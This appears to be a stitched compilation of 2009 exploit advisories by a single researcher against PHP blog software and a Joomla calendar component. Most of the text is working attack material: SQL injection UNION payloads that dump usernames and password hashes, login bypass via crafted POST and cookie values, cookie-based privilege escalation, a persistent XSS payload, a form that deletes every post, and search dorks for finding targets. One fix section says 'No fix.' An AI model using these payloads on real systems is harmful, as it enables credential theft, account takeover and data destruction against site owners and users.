Requisites: magic_quotes_gpc = off
File affected: profile.php
This bug allows a guest to view the username
and password of a registered user.
http://site/path/profile.php?id=-1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user%23
#[1] Authentication Bypass:
Requisites: magic_quotes_gpc = off
File affected: doLogin.php
The following lines are improperly checked:
/*
$un = $_POST['un'];
$pw = $_POST['pw'];
...
$pwHashed = mysql_fetch_array(mysql_query(SELECT
PASSWORD('.$pw.')));
$userRow = mysql_fetch_array(mysql_query(SELECT * FROM user
WHERE
UserName='.$un.'));
if ($userRow['UserPassword'] == $pwHashed[0]
$userRow['UserActive'] !$userRow['UserDisabled']) {
$expires = time() + 3*24*60*60;
setcookie(blogmanuserid, $userRow['UserID'], $expires);
}
*/
Using a SQL Injection bug it is possible to bypass
conditions and to set an arbitrary UserID value.
The following information must be sent using
POST method to doLogin.php
un = ' UNION ALL SELECT
1,NULL,PASSWORD('mypass'),NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,NULL,NULL,NULL,NULL#
pw = mypass
The First value is UserID, the third value is the password,
the tenth value is UserDisabled and the eleventh value is
UserActive.
#[2] Authentication Bypass:
Requisites: none
File affected: all
It is possible to bypass the authentication
system by creating a cookie named 'blogmanuserid',
and inserting the value of a registered user id
into the content(sometimes 1 for admin):
Name: blogmanuserid
Content: 1
Server: target_server (example: localhost)
Path: /blogman/
Privilege Escalation:
Requisites: magic_quotes_gpc = off
File affected: admin.php
It is possible to escalate privileges using
a SQL Injection bug through a cookie.
The following lines are improperly checked:
/*
$id = $_COOKIE['blogmanuserid'];
$user = mysql_fetch_array(mysql_query(SELECT * FROM user WHERE
UserID='.$id.'));
if (!$user['UserCanAdmin']) {
echo meta http-equiv='refresh'
content='0;index.php'/head/html;
} else {
...
}
*/
Name: blogmanuserid
Content: -1' UNION ALL SELECT 2,NULL,3,4,5,6,7,8,9,10,11,12,13,14,15,1#
Server: target_server
EZ-Blog Beta 1 Multiple SQL Injection
*** Salvatore drosophila Fresta *** Application: EZ-Blog http://sourceforge.net/projects/ez-blog/ Version:Beta 1 Bug: * Multiple SQL Injection Exploitation: Remote Date:1 Mar 2009 Discovered by: Salvatore drosophila Fresta Author: Salvatore drosophila Fresta e-mail: drosophila...@gmail.com * - BUGS SQL Injection: Requisites: magic_quotes_gpc = off This is a crazy application because it not require authentication for posting, deleting, etc. and it is entirely vulnerable to SQL Injection, as follows: http://site/path/public/view.php?storyid=-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10%23 There aren't hight reserved information on the database, but it is possible to cause inconvenience. The following injection allow to delete all posts: form action=http://site/path/admin/remove.php; method=POST input type=hidden name=kill value=1'or'1'='1 input type=hidden name=confirm value=1 input type=hidden name=rm value=true input type=submit value=Exploit /form * -- Salvatore drosophila Fresta CWNP444351
RitsBlog 0.4.2 (Authentication Bypass) SQL Injection Vulnerability / XSS Persistent Vulnerability
*** Salvatore drosophila Fresta ***
[+] Application: RitsBlog
[+] Version: 0.4.2
[+] Website: http://sourceforge.net/projects/ritsblog/
[+] Bugs: [A] SQL Injection
[B] XSS Persistent
[+] Exploitation: Remote
[+] Date: 02 Mar 2009
[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com
*
[+] Menu
- [1] Bugs
- [2] Code
- [3] Fix
*
[+] Bugs
- [A] SQL Injection
[-] Requisites: magic_quotes_gpc = off
[-] File affected: ritsBlogAdmin.class.php
This blog is entirely vulnerable to SQL Injection.
The following is the vulnerable query that can be
used to bypass authentication.
In jobs.php:
if ($_GET[j] == login){
if ($blog - login($_GET[p])){
$_SESSION[loggedin] = ok;
$_SESSION[userID] = $blog - userID;
echo Password found. Loging in...;
In ritsBlogAdmin.class.php:
function login($password){
global $db;
$sql = select * from users where secretWord = '$password';
...
}
- [B] XSS Persistent
[-] Requisites: none
[-] File affected: ritsBlogAdmin.class.php
In jobs.php:
if ($_POST[j] == addComment){
echo $blog - addComment($_POST[id], $_POST[name],
$_POST[body]);
}
In ritsBlogAdmin.class.php
function addComment($id, $name, $body){
global $db;
$sql = INSERT INTO comments (name, postID, date, text)
VALUES(' . addslashes($name) . ',' . $id . ',NOW(),' .
addslashes($body) . ');
...
}
*
[+] Code
- [A] SQL Injection
http://www.site.com/path/blogAdmin/jobs.php?j=loginp=1'or'1'='1
- [B] XSS Persistent
It is possible using forms in the index.php or
to send over POST method the following values:
?j=addCommentid=54name=mynamebody=scriptalert('XSS');/script
or
?j=addCommentid=54name=scriptalert('XSS');/scriptbody=body
*
[+] Fix
No fix.
*
--
Salvatore drosophila Fresta
CWNP444351
gigCalendar Joomla Component 1.0 SQL Injection
*** Salvatore drosophila Fresta ***
Application:gigCalendar Joomla Component 1.0
http://joomlacode.org/gf/project/gigcalendar/
Version:gigCalendar 1.0
Bug:* SQL Injection
Exploitation: Remote
Dork: inurl:index.php?option=com_gigcal
Date: 21 Feb 2009
Discovered by:Salvatore drosophila Fresta
Author: Salvatore drosophila Fresta
e-mail: drosophila...@gmail.com
*
- BUGS
SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: banddetails.php
This bug allows a guest to view username and
password of a registered user.
http://www.site.com/path/index.php?option=com_gigcaltask=detailsgigcal_bands_id=-1'
UNION ALL SELECT 1,2,3,4,5,concat('username: ',
username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL
from jos_users%23
*
--
Salvatore drosophila Fresta
CWNP444351
gigCalendar 1.0 (banddetails.php) Joomla Component SQL Injection
*** Salvatore drosophila Fresta ***
Application:gigCalendar Joomla Component 1.0
http://joomlacode.org/gf/project/gigcalendar/
Version:gigCalendar 1.0
Bug:* SQL Injection
Exploitation: Remote
Dork: inurl:index.php?option=com_gigcal
Date: 21 Feb 2009
Discovered by: Salvatore drosophila Fresta
Author: Salvatore drosophila Fresta
e-mail: drosophila...@gmail.com
*
- BUGS
SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: banddetails.php
This bug allows a guest to view username and
password of a registered user.
http://www.site.com/path/index.php?option=com_gigcaltask=detailsgigcal_bands_id=-1'
UNION ALL SELECT 1,2,3,4,5,concat('username: ',
username),concat('password: ', password),NULL,NULL,NULL,NULL,NULL,NULL
FROM jos_users%23
*
--
Salvatore drosophila Fresta
CWNP444351
gigCalendar 1.0 (venuedetails.php) Joomla Component SQL Injection
*** Salvatore drosophila Fresta ***
Application:gigCalendar Joomla Component 1.0
http://joomlacode.org/gf/project/gigcalendar/
Version:gigCalendar 1.0
Bug:* SQL Injection
Exploitation: Remote
Dork: inurl:index.php?option=com_gigcal
Date: 21 Feb 2009
Discovered by:Salvatore drosophila Fresta
Author: Salvatore drosophila Fresta
e-mail: drosophila...@gmail.com
*
- BUGS
SQL Injection:
Requisites: magic_quotes_gpc = off
File affected: venuedetails.php
This bug allows a guest to view username and
password of a registered user.
http://www.site.com/path/index.php?option=com_gigcaltask=detailsgigcal_venues_id=-1'
UNION ALL SELECT 1,concat('username: ',
username),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,concat('password:
', password),NULL,NULL,NULL,NULL,NULL,NULL FROM jos_users%23
*
--
Salvatore drosophila Fresta
CWNP444351
Max.Blog = 1.0.6 (offline_auth.php) Offline Authentication Bypass
### Salvatore drosophila Fresta ### Application:Max.Blog http://www.mzbservices.com Version:Max.Blog = 1.0.6 Bug:* Offline Authentication Bypass Exploitation: Remote Dork: intext:Powered by Max.Blog Date: 27 Jan 2009 Discovered by: Salvatore drosophila Fresta Author: Salvatore drosophila Fresta e-mail: drosophila...@gmail.com - BUGS Offline Authentication Bypass Exploit: Requisites: magic quotes = off File affected: offline_auth.php This bug allows a guest to bypass an offline authentication service using SQL Injection vulnerability. - CODE html head title Salvatore drosophila Fresta - Max.Blog = 1.0.6 Offline Authentication Bypass Exploit /title /head body form action=http://www.site.com/path/offline_auth.php; method=POST input type=text name=username value=admin'# size=15 input type=hidden name=password input type=submit value=Go! /form /body /html -- Salvatore drosophila Fresta CWNP444351
Max.Blog = 1.0.6 (show_post.php) SQL Injection Vulnerability
### Salvatore drosophila Fresta
###
Application:Max.Blog
http://www.mzbservices.com
Version:Max.Blog = 1.0.6
Bug:* SQL Injection
Exploitation: Remote
Dork: intext:Powered by Max.Blog
Date: 20 Jan 2009
Discovered by: Salvatore drosophila Fresta
Author: Salvatore drosophila Fresta
e-mail: drosophila...@gmail.com
- BUGS
SQL Injection:
File affected: show_post.php
This bug allows a guest to view username and password (md5) of a
registered user with the specified id (usually 1 for the admin)
http://www.site.com/path/show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username:
', username),concat('password: ',
password),4,5,6,7+FROM+users+WHERE+id=1%23
--
Salvatore drosophila Fresta
CWNP444351
Max.Blog = 1.0.6 (submit_post.php) SQL Injection Vulnerability
### Salvatore drosophila Fresta ### Application:Max.Blog http://www.mzbservices.com Version:Max.Blog = 1.0.6 Bug:* SQL Injection Exploitation: Remote Dork: intext:Powered by Max.Blog Date: 27 Jan 2009 Discovered by: Salvatore drosophila Fresta Author: Salvatore drosophila Fresta e-mail: drosophila...@gmail.com - BUGS SQL Injection: Requisites: magic quotes = off File affected: submit_post.php This bug allows a registered user to view username and password (md5) of a registered user with the specified id (usually 1 for the admin) http://www.site.com/path/submit_post.php?draft=-1'+UNION+ALL+SELECT+1,NULL,NULL,CONCAT(username,char(58),password)+FROM+users+WHERE+id=1%23 -- Salvatore drosophila Fresta CWNP444351
